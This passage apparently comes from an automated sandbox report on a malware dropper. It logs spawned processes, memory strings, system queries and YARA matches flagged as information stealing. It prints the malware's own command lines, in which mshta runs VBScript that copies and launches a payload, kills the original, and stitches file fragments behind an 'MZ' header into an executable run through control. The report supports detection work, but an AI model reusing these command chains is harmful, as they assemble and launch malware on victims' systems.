                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\09xu.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if ""-pptzyikqlzocarb5ew "" =="""" for %u in ( ""c:\users\user\appdata\local\temp\09xu.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\09xu.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "-pptzyikqlzocarb5ew " =="" for %u in ( "c:\users\user\appdata\local\temp\09xu.exe" ) do taskkill /f -im "%~nxu"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close ( createobject ( "wscript.shell" ). run ( "cmd.exe /q /r echo | set /p = ""mz"" > scmeap.su & copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i & start control .\r6f7se.i " , 0 ,true ) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /q /r echo | set /p = "mz" > scmeap.su &copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i& start control .\r6f7se.i
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if """" =="""" for %u in ( ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "" =="" for %u in ( "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" ) do taskkill /f -im "%~nxu"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\09xu.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if ""-pptzyikqlzocarb5ew "" =="""" for %u in ( ""c:\users\user\appdata\local\temp\09xu.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close ( createobject ( "wscript.shell" ). run ( "cmd.exe /q /r echo | set /p = ""mz"" > scmeap.su & copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i & start control .\r6f7se.i " , 0 ,true ) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\09xu.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "-pptzyikqlzocarb5ew " =="" for %u in ( "c:\users\user\appdata\local\temp\09xu.exe" ) do taskkill /f -im "%~nxu"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /q /r echo | set /p = "mz" > scmeap.su &copy /b /y scmeap.su + 20l2vno.2 + guvil5.sch + 7tcinejp.0 + ykifdqa.1 r6f7se.i& start control .\r6f7se.i
                  Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884377347.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWndhwndIF29F85E0-4FF9-1068-AB91-08002B27B3D9
                  Source: explorer.exe, 0000002F.00000000.1849323092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                  Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 0000002F.00000002.4151503703.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002F.00000000.1850022100.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00475010 cpuid 2_2_00475010
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,19_2_00007FF72F6BAFA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00007FF72F6BB9D4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: try_get_function,GetLocaleInfoW,19_2_00007FF72F6B0734
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_00007FF72F6BB7F8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: EnumSystemLocalesW,19_2_00007FF72F6BB3BC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: EnumSystemLocalesW,19_2_00007FF72F6BB2EC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: EnumSystemLocalesW,19_2_00007FF72F6B0164
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040CA60 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040CA60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2F84 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,19_2_00007FF72F6B2F84
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.30.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.30.drBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\WerFault.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Yara matchFile source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
